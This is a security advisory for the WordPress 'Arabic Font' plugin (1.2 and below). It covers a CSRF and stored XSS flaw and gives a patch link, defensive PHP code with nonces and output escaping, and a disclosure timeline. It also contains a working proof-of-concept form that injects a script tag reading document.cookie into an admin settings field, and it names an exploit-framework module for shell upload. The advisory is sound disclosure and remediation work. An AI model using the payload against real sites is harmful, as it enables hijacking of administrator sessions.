Homepage
https://wordpress.org/plugins/arabic-font/
Overview
Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.
CVSS Score
5.2
CVSS Vector
(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:W/RC:C)
Versions Affected
1.2 and below
Solution
There is no official update to resolve this, but an unofficial patch has been included in this disclosure.
Unofficial Patch
The patched plugin can be found here: https://drive.google.com/file/d/1OWUiPZIQPKIc00hMocr6EukOPoHMWsHZ/view?usp=sharing
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">
<input type="hidden" name="save1" value="Save changes">
<input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
<input type="hidden" name="AF_fontsize" value="18">
<input type="hidden" name="AF_lineheight" value="45">
<input type="hidden" name="AF_textalign" value="Center">
<input type="hidden" name="AF_defaultcssclass" value=".arab"><script>alert(document.cookie)</script><input+type="hidden"+value="">
<input type="hidden" name="AF_customcss" value="">
<input type="hidden" name="action" value="save">
<input type="submit" value="Drink all the booze, hack all the things.">
</form>
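The two root causes named in the overview (no CSRF check on the settings save, no entity encoding of the stored values when they are written back into the admin page) map directly onto standard WordPress APIs. The following is an added example written for this advisory; it is neither the plugin's own code nor the unofficial patch linked above. It reuses the option names visible in the proof of concept (AF_fontfamily, AF_defaultcssclass and so on) and assumes it is included from a plugin's admin page callback; the function names prefixed af_example_ are hypothetical, everything else is WordPress core.

```php
<?php
// Added example (not the plugin's code or the unofficial patch): a settings
// handler that closes both issues from the advisory, CSRF and stored XSS.
// Assumes WordPress is loaded and this file runs from an admin page callback.

// Whitelist of settings the form may change, each paired with a sanitizer.
// Anything not listed here is ignored, so a forged POST cannot smuggle in
// extra option names. Option names are taken from the proof of concept.
function af_example_allowed_fields() {
    return array(
        'AF_fontfamily'      => 'sanitize_text_field',
        'AF_fontsize'        => 'absint',
        'AF_lineheight'      => 'absint',
        'AF_textalign'       => 'af_example_sanitize_align',
        'AF_defaultcssclass' => 'af_example_sanitize_css_selector',
        'AF_customcss'       => 'wp_strip_all_tags',
    );
}

// Restrict text alignment to a fixed set of values.
function af_example_sanitize_align( $value ) {
    $allowed = array( 'left', 'right', 'center', 'justify' );
    $value   = strtolower( sanitize_text_field( $value ) );
    return in_array( $value, $allowed, true ) ? $value : 'right';
}

// Keep only characters that make sense in a list of CSS class selectors.
// Quotes and angle brackets, the characters the PoC relies on, are dropped.
function af_example_sanitize_css_selector( $value ) {
    return preg_replace( '/[^A-Za-z0-9_\-.,#\s]/', '', (string) $value );
}

// Save handler: capability check, then nonce check, then whitelisted update.
function af_example_handle_save() {
    if ( ! isset( $_POST['action'] ) || 'save' !== $_POST['action'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF mitigation: the request must carry a nonce that WordPress issued
    // to this logged-in user for this exact action. A form hosted on an
    // attacker's site cannot obtain it, so the forged POST dies here.
    check_admin_referer( 'af_example_save_settings', 'af_example_nonce' );

    foreach ( af_example_allowed_fields() as $name => $sanitizer ) {
        if ( isset( $_POST[ $name ] ) ) {
            $clean = call_user_func( $sanitizer, wp_unslash( $_POST[ $name ] ) );
            update_option( $name, $clean );
        }
    }
}

// Settings form: the nonce field is emitted, and every stored value is
// entity-encoded for the context it lands in (attribute or textarea), so a
// stored quote or "<script>" renders as text instead of breaking out.
function af_example_render_form() {
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'af_example_save_settings', 'af_example_nonce' ); ?>
        <input type="hidden" name="action" value="save">
        <p><label>Font family
            <input type="text" name="AF_fontfamily"
                   value="<?php echo esc_attr( get_option( 'AF_fontfamily', '' ) ); ?>">
        </label></p>
        <p><label>Default CSS class
            <input type="text" name="AF_defaultcssclass"
                   value="<?php echo esc_attr( get_option( 'AF_defaultcssclass', '.arab' ) ); ?>">
        </label></p>
        <p><label>Custom CSS
            <textarea name="AF_customcss"><?php echo esc_textarea( get_option( 'AF_customcss', '' ) ); ?></textarea>
        </label></p>
        <?php submit_button( 'Save changes', 'primary', 'save1' ); ?>
    </form>
    <?php
}

af_example_handle_save();
af_example_render_form();
```

Two points matter for verifying a fix like this. First, the nonce check must sit on the save path itself rather than only on the page that renders the form, otherwise the PoC's direct POST to admin.php still lands. Second, the encoding function has to match the output context: esc_attr() for attribute values, esc_textarea() inside a textarea, and for values later written into a style block, stripping tags on input so that a stored closing style tag cannot terminate it.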
WordPress Exploit Framework Module
exploit/xss/stored/arabic_font_csrf_stored_xss_shell_upload
WPVDB-ID
Disclosure Timeline
- 2017-07-18: Initial discovery
- 2017-07-18: Contacted vendor with proof of concept and details of the vulnerabilities
- 2017-07-20: Contacted WordPress to report vulnerability
- 2017-07-20: Plugin removed from WordPress repository
- 2017-07-20: Developed an unofficial patch in lieu of the vendor producing one
- 2017-07-20: Released public disclosure